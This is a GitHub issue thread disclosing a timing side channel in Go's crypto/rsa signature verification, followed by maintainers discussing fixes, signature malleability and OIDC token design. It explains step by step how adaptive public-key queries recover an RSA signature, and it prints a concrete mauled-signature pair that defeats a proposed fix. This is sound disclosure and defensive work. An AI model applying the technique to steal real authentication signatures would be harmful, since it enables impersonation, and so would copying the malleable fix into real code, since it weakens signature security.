Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

crypto/rsa: timing channel in VerifyPKCS1v15 and VerifyPSS via Adaptive Public Key Queries #67043

Open
EthanHeilman opened this issue Apr 25, 2024 · 15 comments · May be fixed by #67044 or #67214
Open

crypto/rsa: timing channel in VerifyPKCS1v15 and VerifyPSS via Adaptive Public Key Queries #67043

EthanHeilman opened this issue Apr 25, 2024 · 15 comments · May be fixed by #67044 or #67214
Labels
NeedsInvestigation Someone must examine and confirm this is a valid issue and not a duplicate of an existing one. Security

Comments

@EthanHeilman
Copy link

EthanHeilman commented Apr 25, 2024

Go version

1.20, 1.21, 1.22, latest

Output of go env in your module/workspace:

set GO111MODULE=
set GOARCH=amd64
set GOBIN=
set GOCACHE=C:\Users\e0\AppData\Local\go-build
set GOENV=C:\Users\e0\AppData\Roaming\go\env
set GOEXE=.exe
set GOEXPERIMENT=
set GOFLAGS=
set GOHOSTARCH=amd64
set GOHOSTOS=windows
set GOINSECURE=
set GOMODCACHE=C:\Users\e0\go\pkg\mod
set GONOPROXY=
set GONOSUMDB=
set GOOS=windows
set GOPATH=C:\Users\e0\go
set GOPRIVATE=
set GOPROXY=https://proxy.golang.org,direct
set GOROOT=C:\Program Files\Go
set GOSUMDB=sum.golang.org
set GOTMPDIR=
set GOTOOLDIR=C:\Program Files\Go\pkg\tool\windows_amd64
set GOVCS=
set GOVERSION=go1.20.4
set GCCGO=gccgo
set GOAMD64=v1
set AR=ar
set CC=gcc
set CXX=g++
set CGO_ENABLED=0
set GOMOD=C:\Users\e0\Documents\GitHub\gl-test\go.mod
set GOWORK=
set CGO_CFLAGS=-O2 -g
set CGO_CPPFLAGS=
set CGO_CXXFLAGS=-O2 -g
set CGO_FFLAGS=-O2 -g
set CGO_LDFLAGS=-O2 -g
set PKG_CONFIG=pkg-config
set GOGCCFLAGS=-m64 -fno-caret-diagnostics -Qunused-arguments -Wl,--no-gc-sections -fmessage-length=0 -fdebug-prefix-map=C:\Users\e0\AppData\Local\Temp\go-build395051031=/tmp/go-build -gno-record-gcc-switches

What did you do?

This vulnerability was privately disclosed to the golang project via the official security policy. After consultation with them, we agreed that the best course of action would be to open a ticket. I am currently in the process of putting together a PR which fixes the timing channel.

This vulnerability was discovered while looking for side channels in the GQ Library in OpenPubkey. I was going through the GQ code with @madars at the MIT DCI and he asked what happens if SetBytes returns an error?

What did you see happen?

The functions VerifyPKCS1v15 and VerifyPSS in crypto.rsa have a timing channel vulnerability that allows an adversary who can adaptively specify public keys to extract the signature which is being verified. We provide working proof-of-concept attack code for VerifyPSS and VerifyPKCS1v15. Our code recovers the entire RSA signature about a 90% of the time.

This vulnerability has been tested against go 1.20 and the current on the golang repo. It is likely to impact all recent versions of go.

The Timing Channel

The functions VerifyPKCS1v15 and VerifyPSS call the function encrypt(pub, sig). Encrypt in in turn attempts to map the signature (plaintext) into the modulus (N) of the RSA public key (pub). If N is smaller than the signature (plaintext), SetBytes will fail and return the error "input overflows the modulus." This will cause encrypt to fail immediately and not perform any RSA math operations. The time difference between the sig overflowing the modulus N and not overflowing the modulus N is roughly the time it takes to verify an RSA signature. In our tests that is roughy 130,000 nanoseconds.

func encrypt(pub *PublicKey, plaintext []byte) ([]byte, error) {
	boring.Unreachable()

	N := bigmod.NewModulusFromBig(pub.N)
	m, err := bigmod.NewNat().SetBytes(plaintext, N)
	if err != nil {
		return nil, err
	}
	e := intToBytes(pub.E)

	return bigmod.NewNat().Exp(m, e, N).Bytes(N), nil
}

To perform that attack, the attacker sets an RSA Public Key modulus N to the highest value allowed by that key size. In our examples, that would be 2^2049 - 1. The attacker then flips the most significant bit to zero and queries VerifyPKCS1v15 using that Public Key. If the signature is larger than N, VerifyPKCS1v15 will fail quickly, if the signature is smaller than N, it will fail after doing a full RSA verification. Based on how long it took VerifyPKCS1v15 determines if the first bit of the signature is 0 or 1. The attacker then sets the bit it learned about in the public key modulus and repeats this process to learn the next bit.

As shown below the timing channel is larger in go 1.20 than in the latest code as b2dbfbf changed the RSA encrypt function from:
return bigmod.NewNat().ExpShort(m, e, N).Bytes(N), nil to return bigmod.NewNat().ExpShortVarTime(m, e, N).Bytes(N), nil. This reduction in the timing channel does not prevent the attack and we have successful extract signatures from both go 1.20 and go latest.

Timing difference on VerifyPKCS1v15 (go 1.20)

VerifyPKCS1v15

Timing difference on VerifyPSS (go 1.20)

VerifyPSS

Timing difference on VerifyPKCS1v15 (go latest)

VerifyPKCS1v15

Timing difference on VerifyPSS (go latest)

VerifyPSS

Security Impact

We assume an attacker whose goal is to learn a signature and who is able to trigger VerifyPKCS1v15 or VerifyPSS on a public key of the attacker's choice. In theory the attacker learns 1-bit of the signature per query to the verify function, in actual practice we require 5 queries due to the timing measurement being noisy. To recover an entire signature the attacker must have the ability to:

  1. Call verify many times on the same signature with a public key of the attackers choice.
  2. and choose this public key in an adaptive fashion based on the results of past queries.

There are many cases in which an RSA signature must be kept secret, for instance in OpenID Connect, the RSA signature on an ID Token functions as an authentication secret. An attacker who learns the RSA secret for an ID Token may be able to fully reconstruct the ID Token and assume the authorization and access privileges of the party to who the ID Token was issued.

It is very unusual for an attacker to be able to specify, let alone adaptively specify, the public key used to verify a signature. This is the primary reason we consider the impact of this attack lower than a timing channel in signing. That said, there are real world cases in which an attacker may have this capability is chained with another vulnerability. For instance the attacker may be able to cause faults in the verifying system and flip bits in the public key.

The timing difference leveraged in this attack is large enough to make the attack highly practical. Our unoptimized example code recovers an RSA 2048 signature with ~90% probability in roughly 2 seconds. A recent test running on my windows desktop machine I recovered 98 out of 100 2048-signatures via VerifyPSS in about 205 seconds, (~2 seconds a signature).

What did you expect to see?

I expect RSA Verify operations to be constant time. As stated in the comment at the top of crypto/rsa.go

// Operations in this package are implemented using constant-time algorithms,
// except for [GenerateKey], [PrivateKey.Precompute], and [PrivateKey.Validate].
// Every other operation only leaks the bit size of the involved values, which
// all depend on the selected key size.]()

This is not the case for the encrypt function in crypto.rsa as it is not constant time.

We have a simple and short fix which addresses this issue which we plan to create a PR for shortly. This fix is proposed in PR #67044

We measure our fix on the latest version of golang showing that VerifyPKCS1v15 and VerifyPSS are now constant time.

Current is go without the fix, Fixed is go with the fix proposed in PR #67044
The y-axis is number of samples in a particular bin.
The x-axis is the time it takes the RSA verify operation to return.

VerifyPKCS1v15 (go latest)

VerifyPKCS1v15

VerifyPSS (go latest)

VerifyPSS

@EthanHeilman EthanHeilman linked a pull request Apr 25, 2024 that will close this issue
@gopherbot
Copy link

Change https://go.dev/cl/581855 mentions this issue: crypto.rsa: fixes RSA mod overflow timing channel

@odeke-em odeke-em changed the title Timing Channel in VerifyPKCS1v15 and VerifyPSS Via Adaptive Public Key Queries crypto/rsa: timing channel in VerifyPKCS1v15 and VerifyPSS via Adaptive Public Key Queries Apr 26, 2024
@FiloSottile
Copy link
Contributor

Thank you for bringing this up, the behavior definitely contradicts the package-level comment.

However, I am not convinced we should try to make verification constant time with respect to the signature. Doing so properly is more complex than CL 581855: for example, emsaPSSVerify is not at all constant time and would need to be rewritten. Constant time checks are much more prone to mistakes, with the potential of introducing signature forgery attacks. For example, I think CL 581855 makes RSA signatures malleable, since m+N is now reduced to m.

My understanding is that public key operations have always been considered public. BoringSSL for example does the same thing we do. If OpenID Connect made an RSA signature an authentication secret... honestly it sounds like they messed up.

On the other hand, I think the opposite attack, recovering the public key with adaptive signature queries, also works, right? That's unfortunate, because I might imagine anonymity systems that verify attacker-controlled signatures using a "secret" public key.

@FiloSottile FiloSottile added Security NeedsInvestigation Someone must examine and confirm this is a valid issue and not a duplicate of an existing one. labels Apr 26, 2024
@EthanHeilman
Copy link
Author

EthanHeilman commented Apr 26, 2024

I appreciate you taking the time to review this. Writing crypto code is always trick and the more eyes the better.

On the other hand, I think the opposite attack, recovering the public key with adaptive signature queries, also works, right?

Yes, I did not write a proof of concept for it, but this privacy risk was included in my initial disclosure.

However, I am not convinced we should try to make verification constant time with respect to the signature. Doing so properly is more complex than CL 581855: for example, emsaPSSVerify is not at all constant time and would need to be rewritten.

My view is that constant time should be taken on a case by case basis. In cases where the fix is easy and introduces minimal performance overhead then it is worth doing. In cases where the fix includes significant complexity or performance costs then it may not be worth it. For instance your switch in rsa.encrypt from out.ExpShort(x, 12, m) to out.ExpShortVarTime(x, 12, m) has such a massive increase in performance that I would not argue for it to be constant time unless someone found it introduced a serious practical attack.

For PSSVerify and VerifyPKCS1v15, the fix improves security at no performance cost. If making emsaPSSVerify constant time isn't a good tradeoff then we should document the ways in which it is not constant time and leave it as is.

For example, I think CL 581855 makes RSA signatures malleable, since m+N is now reduced to m.

As far as I can tell CL 581855 does not make RSA signatures malleable because a RSA signature (m+N) will always fail to verify.

em, encErr := encrypt(pub, sig)
// Only checking if em == nil to avoid timing attacks, encErr
// will be checked at the very end of the function.
// Please see https://golang.org/issue/67043
if em == nil {
  return ErrVerification
}
// ...

if ok != 1 || encErr != nil {
  return ErrVerification
}

If the size of the signature is greater than N, encrypt will return an error in encErr and encErr is checked before returning so the signature will never successfully verify. Making the RSA signature malleable would be bad, If I got this wrong need to fix it.

If OpenID Connect made an RSA signature an authentication secret... honestly it sounds like they messed up.

Most bearer authentication schemes, including OAuth, OIDC and JWTs use signatures, often RSA signatures, as authentication secrets, e.g., Google RSA signs a token which says "I'm google and the person who holds this token is alice@gmail.com." If you learn the RSA signature, you can reconstruct the token and present it to impersonate Alice.

GQ signatures (ISO/IEC 14888-2:2008) treat RSA signatures as signing keys. We use "filippo.io/bigmod" for constant time GQ Signatures.

@FiloSottile
Copy link
Contributor

My view is that constant time should be taken on a case by case basis. In cases where the fix is easy and introduces minimal performance overhead then it is worth doing. In cases where the fix includes significant complexity or performance costs then it may not be worth it. For instance your switch in rsa.encrypt from out.ExpShort(x, 12, m) to out.ExpShortVarTime(x, 12, m) has such a massive increase in performance that I would not argue for it to be constant time unless someone found it introduced a serious practical attack.

For PSSVerify and VerifyPKCS1v15, the fix improves security at no performance cost. If making emsaPSSVerify constant time isn't a good tradeoff then we should document the ways in which it is not constant time and leave it as is.

My approach is a little different: I think we should be clear on what is and what isn't constant time (which currently we aren't, and we need to fix that), and then we need to be perfectly constant time for the things that we document as such (regardless of performance), and optimize for simplicity (or performance) for the rest. Setting clear expectations helps applications figure out if the library fits their need or not.

"More but not fully" constant time is unfortunately not a thing, as an endless string of paper optimizing attacks has proven.

ExpShortVarTime is not justified by being very fast, but by the decision (which I failed to document) that we don't need to be constant time with respect to the public key exponent (because everyone should be using 0x1001 anyway).

We care a lot more about the complexity/review cost than about the performance cost.

If the size of the signature is greater than N, encrypt will return an error in encErr and encErr is checked before returning so the signature will never successfully verify.

Hmm, I am not 100% sure here, but if sig < 2^ceil(log2(N)) - N, then sig + N will have the right size but still overflow N, and SetOverflowingBytes will not return an error (because it's meant for ECDSA where it has to reduce) and encErr will be nil. In that case both sig and sig+N would end up valid signatures. Maybe sig can't be made to be that small?

@FiloSottile
Copy link
Contributor

Most bearer authentication schemes, including OAuth, OIDC and JWTs use signatures, often RSA signatures, as authentication secrets, e.g., Google RSA signs a token which says "I'm google and the person who holds this token is alice@gmail.com." If you learn the RSA signature, you can reconstruct the token and present it to impersonate Alice.

This is really unfortunate. I think this strategy will run up against 20 years of established cryptographic library assumptions that signature verification is public.

Why not sign "I'm Google and the person who holds random(32) is alice@gmail.com" instead, and require knowledge of the secret random(32) to use the signature? I suppose it might be too late, but maybe it would still be easier to make that change/extension than going to every cryptography library and getting them to treat signatures as secrets.

@EthanHeilman
Copy link
Author

EthanHeilman commented Apr 28, 2024

Why not sign "I'm Google and the person who holds random(32) is alice@gmail.com" instead, and require knowledge of the secret random(32) to use the signature?

Some ID Token's have a nonce claim which is is random(~32) and does prevent forging the ID Token if you only know the RSA signature. The nonce claim was not intended for this purpose and is not a required property of ID Tokens or JWTs in general. For instance Google only includes the nonce in the first ID Token you receive from Google.

My project, OpenPubkey, uses claims like nonce to commit to a user's public key, turning the ID Token into a public value that functions like a certificate. This or similar patterns could be used to make OIDC signature verification public, but such improvements are still in the early days.

I am not 100% sure here, but if sig < 2^ceil(log2(N)) - N, then sig + N will have the right size but still overflow N,

Yes, you are correct. I misunderstood the SetOverflowingBytes error message "input overflows the modulus size" as covering this case. Looking again I see the non-byte length check is "input overflows the modulus." I'm very glad you caught my mistake, disappointed that I made the mistake in the first place.

Maybe sig can't be made to be that small?

I investigated this and it takes only a few seconds to create such mauled signatures by just randomly generating key pairs and then signing random messages until a signature is small enough that sig+N < bitlen(N). The following two signatures both verify for the same message.

Public key N:		 e007aa995662b8e15e4006e87a65217dea058c18d718ff1f2b184ce28f6ca575eb5be856255575f80df4e0ed35cc7b65f10ffb916375e82161e812a7d31e88b37ce73f98161122aa17ff0e08f476553666610ddc475b1d927156a81edb7f8cfeb59d326a6a513f06a06b46b8e1d10923baac0822b2206bfdb5c305b53ae19d8dfd74223dc19aab86b1eafb76c8900364a302c061dc65ed75fead477323a451d1ebf73f633c2e4a36c08a0e29304ff1672fd500171b5ad8d76d6cd14d25f1b39dc995f3757ebdefc8da7453d5ec8f595f07e5d8a039248c2250bf36221661cf386a60267ebaf3550deeb7dcc77cbb2a49837ef2cbe7e3c582ad5f77c266cf9b6d (256)
Sig:		 009bfb983e6129a0df25c677cd2440af51fd5abd62144e20c674a769c20ccd42f5f3c2dcf36c1ec83e8fe95e4aaa526e362876a4f1e440ac8b306700b32e6ed27e23e07182d1f418e23926168e1ccca1bd7e619ad8a63e9022db63e72cc9459acdb3cc424675e620aea282282cdb24ab726911f8f8881e19004ab13493f9d37b7b61dfeb42c7c159627daca1e67e72abaa50727c7d2925abcc7e8b1ad0195e6426254117f1e67dccca01c8780dcb5a45ed4fc4153919ede5fae2fbf9d538f4ae5e4b35a85ff1dede093b1cac6a5f4cdde88732c7f5d7d3995a0e381cb203bd8d92b4063b847fe94ef4cd79c5a63d85b69d8144e0d8ca8a51f4876e726c2cec71  (256) 
Msg:		 test message: 1  
Mauled Sig:	 e0a3a63194c3e2823d65cd604789622d3c02e6d6392d4d3ff18cf44c517972b8e14fab3318c194c04c84ca4b8076cdd427387236555a28cded1879a8864cf785fb0b200998e316c2fa38341f829321d823df6f7720015c2294320c060848d2998350feacb0c725274f0dc8e10eac2dcf2d151a1baaa88a16b60db6e9cedb710978d6022904626ce01468a818af0e76104d5332de598f1321cb2bd28df3bdb036121c807b2e14c8038a8bd6a13e1b4bad1d24c42c5474c6bd684fcd46fb2aa84c27e1291ddeafcea6e3af708256eea63cf06d0b682efc5fbbaacd6e3ec8658cc5fd142cba3f733e5ce385568d22f8b000210037acc0ae4fd4a1e6e634d2fc87de (256)

This is probably a good thing to check for in RSA libraries. I'm am likely not the only one who made this mistake.

It seems like using m.SetBytes rather then m.SetOverflowingBytes fixes this, no?

func encrypt(pub *PublicKey, plaintext []byte) ([]byte, error) {
	boring.Unreachable()

	N, err := bigmod.NewModulusFromBig(pub.N)
	if err != nil {
		return nil, err
	}
	m := bigmod.NewNat()
	_, encErr := m.SetBytes(plaintext, N)
	e := uint(pub.E)

	return bigmod.NewNat().ExpShortVarTime(m, e, N).Bytes(N), encErr
}

I want to do more tests and perhaps add a few unit tests to catch some these cases before merging. Is there someway I can mark CL 581855 as no longer ready for merge?

@FiloSottile
Copy link
Contributor

Why not sign "I'm Google and the person who holds random(32) is alice@gmail.com" instead, and require knowledge of the secret random(32) to use the signature?

Some ID Token's have a nonce claim which is is random(~32) and does prevent forging the ID Token if you only know the RSA signature. The nonce claim was not intended for this purpose and is not a required property of ID Tokens or JWTs in general. For instance Google only includes the nonce in the first ID Token you receive from Google.

My project, OpenPubkey, uses claims like nonce to commit to a user's public key, turning the ID Token into a public value that functions like a certificate. This or similar patterns could be used to make OIDC signature verification public, but such improvements are still in the early days.

I think that since you're already applying structure to the nonce, and especially given it's in the early days, you have the opportunity to make OpenPubkey actually safe with the properties that most cryptographic libraries provide.

In practice, I think we all leak at most the public key, the signature, and the hash of the message, but even better would be to put H(random(16+)) in the claim, and require random(16+) to verify the token, so you don't rely on the implicit hashing step and you can tolerate every input to Verify being public.

I informally spoke with a couple other cryptography library maintainers yesterday and this is really not just about Go. In fact, if you can recommend the best forum to bring this up with the OIDC ecosystem more broadly, I think we'll want to reach out.

This is probably a good thing to check for in RSA libraries. I'm am likely not the only one who made this mistake.

Have a look if Wycheproof already has vectors for this, otherwise feel free to make a PR!

It seems like using m.SetBytes rather then m.SetOverflowingBytes fixes this, no?

No, SetBytes takes variable time depending on whether s >= N or not. SetOverflowingBytes was the right idea, but to make this work you'd also have to modify it to return in constant time a 0/1 int that reports whether it reduced, and then use that as part of the ok mask.

However, this is the kind of complexity I am talking about when I say I don't think we want to support this.

I want to do more tests and perhaps add a few unit tests to catch some these cases before merging. Is there someway I can mark CL 581855 as no longer ready for merge?

You can mark WIP, but my Hold+1 will prevent merging already.

To be upfront and not to waste your time, I don't think there are good chances we'll merge this or a variant. Rather, I think we'll want to fix the comments about the constant timedness properties we provide.

I would however very much appreciate your help making OpenPubkey and maybe even OIDC robust with the properties we actually provide, partially because again it's not just Go, and you should assume that any successful standard will end up implemented on top of most existing cryptographic libraries.

@EthanHeilman
Copy link
Author

In practice, I think we all leak at most the public key, the signature, and the hash of the message, but even better would be to put H(random(16+)) in the claim, and require random(16+) to verify the token, so you don't rely on the implicit hashing step and you can tolerate every input to Verify being public.

OpenPubkey commits to three things in the nonce claim: public_key, algorithm and a random value. This keeps the nonce random and you can verify the ID Token with opening the commitment in the nonce.

I informally spoke with a couple other cryptography library maintainers yesterday and this is really not just about Go. In fact, if you can recommend the best forum to bring this up with the OIDC ecosystem more broadly, I think we'll want to reach out.

I agree, I've just been staying quite about other libraries because I haven't disclosed it to them yet. I have not found a library that does not have this behavior. I'm talking another library maintainer on Wednesday who reached out after seeing this issue.

To be upfront and not to waste your time, I don't think there are good chances we'll merge this or a variant. Rather, I think we'll want to fix the comments about the constant timedness properties we provide.

Thanks, I'll probably put together a fix and likely write up my notes on my blog for my own edification. I understand if golang decides it is too complex to fix.

My original fix checking that if the real signature overflowed and if it did substituting the decoy signature for the overflowing signature to keep the timing the same. It didn't seem to fix well within the style of the library.

I would however very much appreciate your help making OpenPubkey and maybe even OIDC robust with the properties we actually provide, partially because again it's not just Go, and you should assume that any successful standard will end up implemented on top of most existing cryptographic libraries.

I can definitely help with OpenPubkey since I'm the main person who is designing and writing it. OIDC will be tricker as I don't have many connections in the OIDC standards body and making a change like this would require getting google, microsoft, facebook, okta, etc... on board. That said, I'd be very interested in pitching OpenPubkey to major OpenID Providers like Google.

@sophieschmieg
Copy link

I would not consider non-constant time verification behavior that leaks message (realistically hash of message), signature, or public key a vulnerability of the cryptographic library. A digital signature scheme cryptographically provides existential unforgeability under chosen message attacks [1], but does not give any guarantees about the secrecy of any of its inputs.

Realistically, the message will be hashed before being used by the signature algorithm, in some cases like EdDSA and SLH-DSA several times, so while a construction using hashes of secrets should be fine, we should define and document this property for the larger cryptographic community. I have to admit, I do not currently know how to define this behavior of not leaking inputs to the signature scheme, though.

As for this particular case, I do not think there is a realistic vulnerability here. An attacker with control over the public key used in authentication can just change that public key to one they control, and sign themselves a token in order to impersonate the user, so I agree with Filippo that the main mitigation here is updating the comment to clarify that verification might be variable time.

More generally, there are two things to follow up on here:

  1. We need to ensure that any asymmetrically signed authentication token is unpredictable and contains entropy that is not revealed to a potential attacker. This includes making sure that protocols are not vulnerable to recipient-forwarding attacks and similar. Ideally, signed messages should contain all context necessary to identify a user, like a challenge provided by the verifier to prove freshness, as the nonce does in OIDC. In particular that means that we need to change the nonce to be required in all OIDC flows, if I'm not mistaken.
  2. As mentioned above, we need to document the property of not revealing the original message and only a hash of it and define it properly, so that algorithm designers and implementers can give the necessary guarantees to protocol designers. I don't have high hopes for being able to get cryptographers to guarantee not leaking hash of message, signature, and public key though, in many cases the public key is for example directly leaked by knowing just a few or even just one valid message-signature pair (ECDSA, RSA (any padding), and SLH-DSA all leak the public key as far as I can tell, with ML-DSA being the only soon-to-be-standardized exception to this rule)

[1] https://toc.cryptobook.us/book.pdf, attack game 13.1

@EthanHeilman
Copy link
Author

EthanHeilman commented Apr 29, 2024

This hash of hashes idea is indeed interesting. It reminds of the use of hashed serial numbers in RSA blind signatures [1,2].

An attacker with control over the public key used in authentication can just change that public key to one they control,

If the signature is used in multiple places, as is sometimes the case with ID Tokens, the aim of an attacker may not be to pass verification on the targeted instance, but their aim may to learn the signature so they can replay it elsewhere. An attacker who can adaptively flip bits of a public key is a fairly uncommon attacker capability. That said, if the fix is simple/low cost enough I would like to present my case for fixing it. I am delaying my taking a position on this until I have a working fix to determine how simple a fix would be.

On the other hand if constant time is not a desired property for RSA verification then shouldn't this allow for performance improvements in the RSA verification functions here? Is there any value in preserving constant time ops in verification if we are willing to treat verification as public?

In particular that means that we need to change the nonce to be required in all OIDC flows, if I'm not mistaken.

This would certainly help. This solution has some limitations:

  • The nonce is not treated as a secret but instead as a session binding value. The OIDC client which generates it passes it in the URL to the authentication server. This increase the risk for exposure.
  • The refresh flow is used to help mitigate risks of compromised ID Tokens. Requiring that the nonce be included in refreshed ID Tokens would provide a real security improvement, but an expired ID Token would leak the nonce used in a refreshed ID Token. Azure in fact currently maintains the nonce through refreshes.
  • The nonce is specified by the OIDC software, often javascript, running in an app or web browser. The server signing and issuing ID Tokens can not force this software to choose an high entropy nonce.
  • The nonce assumes a flow that allows the party requesting the token to specify a nonce. For instance adding a nonce to github-actions OIDC flow would require updating client libraries so that they could supply a nonce.

Moving to OpenPubkey does address this and I'm always in favor of more OpenPubkey, but moving verifiers to OpenPubkey is not a short term solution.

A more immediate solution would be to have ID Token (or JWT) issuer include a new claim with a random value which has sufficient entropy to make the ID Token unguessable. This approach does roughly the same thing as the nonce, but without the nonce drawbacks. OpenID Providers could add a new claim to their ID token tomorrow without requiring any changes to clients or verifiers (no one would notice). In fact JWT RFC already specifies a claim that pretty close to what we want:

The "jti" (JWT ID) claim provides a unique identifier for the JWT. The identifier value MUST be assigned in a manner that ensures that there is a negligible probability that the same value will be accidentally assigned to a different data object; if the application uses multiple issuers, collisions MUST be prevented among values produced by different issuers as well. - RFC-7519

[1]: Security Analysis of RSA-BSSA, Anna Lysyanskaya (2022)

[2]: RFC 9474 - RSA Blind Signatures

@EthanHeilman
Copy link
Author

Making VerifyPKCS1v15 constant time seems like a simple fix because was designed to be constant time. On the other hand VerifyPSS does not at all appear to be constant time. Without a larger effort to make VerifyPSS constant time, I don't think it is worth fixing.

The good news is that OIDC only uses PKCS1v15. Fixing it in PKCS1v15 would address the OIDC ID Tokens. JWS (JSON Web Signatures) which is what OIDC is built on only uses PKCS1-v1_5 and the OIDC spec only makes RSA PKCS1-v1_5 the requirement.

The spec says: "OPs MUST support signing ID Tokens with the RSA SHA-256 algorithm (an alg value of RS256)". RS256 defined in the RFC-7518 as RSASSA-PKCS1-v1_5 using SHA-256..

@FiloSottile
Copy link
Contributor

I suppose it depends on whether you consider what I described in #67043 (comment) a simple fix (and I am not convinced I do), but I am not at all comfortable with "most of our Verify functions consider their inputs public, except this old one, because there's a protocol that made wrong assumptions, and we hope they never upgrade to a different algorithm".

@EthanHeilman
Copy link
Author

EthanHeilman commented May 1, 2024

Here is a early draft of my fix, I'll still testing it and doubling checking my assumptions, early feedback is appreciated. This approach trades-off having to run the SetOverflowingBytes twice for not touching the encrypt function, the performance hit is about 15%. Alternatively:

  1. I could introduce a constantTimeEncrypt function alongside encrypt that returns 0/1 int instead of err.
  2. or I could replace the err in encrypt with a 0/1 int, but calling functions would lose the custom error messages returned by encrypt. I experimented with passing both a 0/1 int and err from encrypt, but that seemed like a foot gun because anyone calling it would need to know to check both err and 0/1.

I'm starting to lean towards the constantTimeEncrypt option although I would need a better name as it isn't actually constant time due to VarExp. It just doesn't leak N or sig.

"most of our Verify functions consider their inputs public, except this old one, because there's a protocol that made wrong assumptions, and we hope they never upgrade to a different algorithm"

Isn't that already the state the library is in right now? VerifyPKCS1v15 has been designed to be constant time, whereas VerifyPSS was not. It seems worthwhile to preserve the constant time properties of VerifyPKCS1v15.

For evidence for your PSS point, while OIDC requires RSA PKCS1v15, JWS allows the use of many more algorithms including RSA PSS. So there is value in making VerifyPSS constant time as well as it will likely be increasingly used as an authentication secret. The draft standard Financial-grade API: Client Initiated Backchannel Authentication Profile
requires either PS256 (RSA PSS SHA256) or ES256 (ECDSA P-256 SHA256). However making RSA PSS constant time is a much larger change to the code base since the non-constant time behavior in VerifyPSS extends well beyond this single timing channel.

@EthanHeilman
Copy link
Author

EthanHeilman commented May 6, 2024

@sophieschmieg @FiloSottile
I have updated my PR with my current fix (CL 581855). This fix introduces a timing safe encrypt function in addition to the existing encrypt and changes VerifyPKCS1v15 and VerifyPSS to use this timing safe encrypt while leaving the functions not impacted by this timing channel to use the current encrypt.

Here are the measurements VerifyPKCS1v15 with this fix
before and after graph of timing channel for VerifyPKCS1v15
and VerifyPSS with this fix:
before and after of timing channel for VerifyPSS

Based on prior discussion, it seems unlikely this fix (CL 581855) will be merged. I have created PR (CL 583304) with comments updating the erroneous documentation.

I have no objection to resolving this issue after:

  1. CL 581855 (the fix) is merged,
  2. or CL 583304 (documentation fix) is merged,
  3. or the another party updates the documentation.

I don't plan to do anymore work on this unless something changes.

I would like to collect statements from RSA libraries, including golang crypto package, stating the signatures are not considered confidential. Such statements would be useful to make a case that OIDC should not expect signatures to be treated as confidential. If you could make such a statement in the official documentation of this project that would be very helpful.

@gopherbot
Copy link

Change https://go.dev/cl/583304 mentions this issue: crypto/rsa: documents timing leaks in rsa package

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
NeedsInvestigation Someone must examine and confirm this is a valid issue and not a duplicate of an existing one. Security
Projects
None yet
4 participants